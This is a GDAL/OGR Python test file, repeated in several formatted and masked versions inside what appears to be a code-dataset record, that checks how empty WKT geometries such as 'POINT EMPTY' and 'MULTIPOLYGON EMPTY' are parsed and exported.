gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
<|reserved_special_token_0|>
for item in empty_wkt_list:
ut = TestWktEmpty(item[0], item[1])
gdaltest_list.append((ut.CheckIsEmpty, item[0]))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
gdaltest.setup_run('ogr_wktempty')
gdaltest.run_tests(gdaltest_list)
gdaltest.summarize()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../pymod')
<|reserved_special_token_0|>
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
empty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (
'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (
'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',
'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (
'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',
'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',
'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',
'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (
'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),
('POLYGON EMPTY', 'POLYGON EMPTY')]
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
gdaltest_list = []
for item in empty_wkt_list:
ut = TestWktEmpty(item[0], item[1])
gdaltest_list.append((ut.CheckIsEmpty, item[0]))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
gdaltest.setup_run('ogr_wktempty')
gdaltest.run_tests(gdaltest_list)
gdaltest.summarize()
<|reserved_special_token_1|>
import os
import sys
import string
sys.path.append('../pymod')
import gdaltest
import ogrtest
from osgeo import ogr
from osgeo import gdal
class TestWktEmpty:
def __init__(self, inString, expectedOutString):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if geom.IsEmpty() == False:
geom.Destroy()
gdaltest.post_reason(
'IsEmpty returning false for an empty geometry')
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt(self.inString)
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(
) != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason('WKT is wrong: ' + wkt +
'. Expected value is: ' + self.expectedOutString)
return 'fail'
empty_wkt_list = [('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'), (
'MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'), (
'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',
'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (
'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',
'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',
'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',
'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (
'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),
('POLYGON EMPTY', 'POLYGON EMPTY')]
def ogr_wktempty_test_partial_empty_geoms():
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))
ring = ogr.Geometry(type=ogr.wkbLinearRing)
ring.AddPoint_2D(0, 0)
ring.AddPoint_2D(10, 0)
ring.AddPoint_2D(10, 10)
ring.AddPoint_2D(0, 10)
ring.AddPoint_2D(0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))
geom.AddGeometry(ogr.CreateGeometryFromWkt(
'POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +
'. Expected value is: ' + wkt)
return 'fail'
return 'success'
gdaltest_list = []
for item in empty_wkt_list:
ut = TestWktEmpty(item[0], item[1])
gdaltest_list.append((ut.CheckIsEmpty, item[0]))
gdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)
if __name__ == '__main__':
gdaltest.setup_run('ogr_wktempty')
gdaltest.run_tests(gdaltest_list)
gdaltest.summarize()
<|reserved_special_token_1|>
#!/usr/bin/env python
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test support for the various "EMPTY" WKT geometry representations.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2004, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008, Even Rouault <even dot rouault at mines-paris dot org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
###############################################################################
import os
import sys
import string
sys.path.append( '../pymod' )
import gdaltest
import ogrtest
from osgeo import ogr
from osgeo import gdal
class TestWktEmpty:
def __init__( self, inString, expectedOutString ):
self.inString = inString
self.expectedOutString = expectedOutString
def isEmpty(self, geom):
try:
ogr.Geometry.IsEmpty
except:
return 'skip'
if (geom.IsEmpty() == False):
geom.Destroy()
gdaltest.post_reason ("IsEmpty returning false for an empty geometry")
return 'fail'
return 'success'
def CheckIsEmpty(self):
geom = ogr.CreateGeometryFromWkt( self.inString )
wkt = geom.ExportToWkt()
if self.expectedOutString != 'POINT EMPTY':
if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt() != wkt:
return 'fail'
if wkt == self.expectedOutString:
if self.isEmpty(geom) == 'fail':
return 'fail'
else:
return 'success'
else:
gdaltest.post_reason( 'WKT is wrong: ' + wkt + '. Expected value is: ' + self.expectedOutString )
return 'fail'
empty_wkt_list = [ \
('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),
('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'),
('MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'),
('MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'),
('POINT ( EMPTY )', 'POINT EMPTY'),
('LINESTRING(EMPTY)', 'LINESTRING EMPTY'),
('POLYGON ( EMPTY )', 'POLYGON EMPTY'),
('GEOMETRYCOLLECTION EMPTY', 'GEOMETRYCOLLECTION EMPTY'),
('MULTIPOLYGON EMPTY', 'MULTIPOLYGON EMPTY'),
('MULTILINESTRING EMPTY', 'MULTILINESTRING EMPTY'),
('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'),
('POINT EMPTY', 'POINT EMPTY'),
('LINESTRING EMPTY', 'LINESTRING EMPTY'),
('POLYGON EMPTY', 'POLYGON EMPTY')
]
def ogr_wktempty_test_partial_empty_geoms():
# Multipoint with a valid point and an empty point
wkt = 'MULTIPOINT (1 1)'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Multipoint with an empty point and a valid point
geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')
geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))
wkt = 'MULTIPOINT (1 1)'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Multilinestring with a valid string and an empty linestring
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Multilinestring with an empty linestring and a valid linestring
geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')
geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))
geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))
wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Polygon with a valid external ring and an empty internal ring
wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Polygon with an empty external ring and a valid internal ring
wkt = 'POLYGON EMPTY'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))
ring = ogr.Geometry( type = ogr.wkbLinearRing )
ring.AddPoint_2D( 0, 0)
ring.AddPoint_2D( 10, 0)
ring.AddPoint_2D( 10, 10)
ring.AddPoint_2D( 0, 10)
ring.AddPoint_2D( 0, 0)
geom.AddGeometry(ring)
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Multipolygon with a valid polygon and an empty polygon
wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'
geom = ogr.CreateGeometryFromWkt(wkt)
geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
# Multipolygon with an empty polygon and a valid polygon
geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')
geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))
geom.AddGeometry(ogr.CreateGeometryFromWkt('POLYGON ((100 0,100 10,110 10,100 0))'))
wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'
if geom.ExportToWkt() != wkt:
gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )
return 'fail'
return 'success'
gdaltest_list = []
for item in empty_wkt_list:
ut = TestWktEmpty( item[0], item[1] )
gdaltest_list.append( (ut.CheckIsEmpty, item[0]) )
gdaltest_list.append( ogr_wktempty_test_partial_empty_geoms )
if __name__ == '__main__':
gdaltest.setup_run( 'ogr_wktempty' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
|
flexible
|
{
"blob_id": "1ef1dcc8fdf4d813dad70c860e33778715d51b0c",
"index": 1575,
"step-1": "<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\n<mask token>\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../pymod')\n<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason('WKT is wrong: ' + wkt +\n '. Expected value is: ' + self.expectedOutString)\n return 'fail'\n\n\n<mask token>\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\n<mask token>\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-3": "<mask token>\nsys.path.append('../pymod')\n<mask token>\n\n\nclass TestWktEmpty:\n\n def __init__(self, inString, expectedOutString):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n if geom.IsEmpty() == False:\n geom.Destroy()\n gdaltest.post_reason(\n 'IsEmpty returning false for an empty geometry')\n return 'fail'\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt(self.inString)\n wkt = geom.ExportToWkt()\n if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt(\n ) != wkt:\n return 'fail'\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n 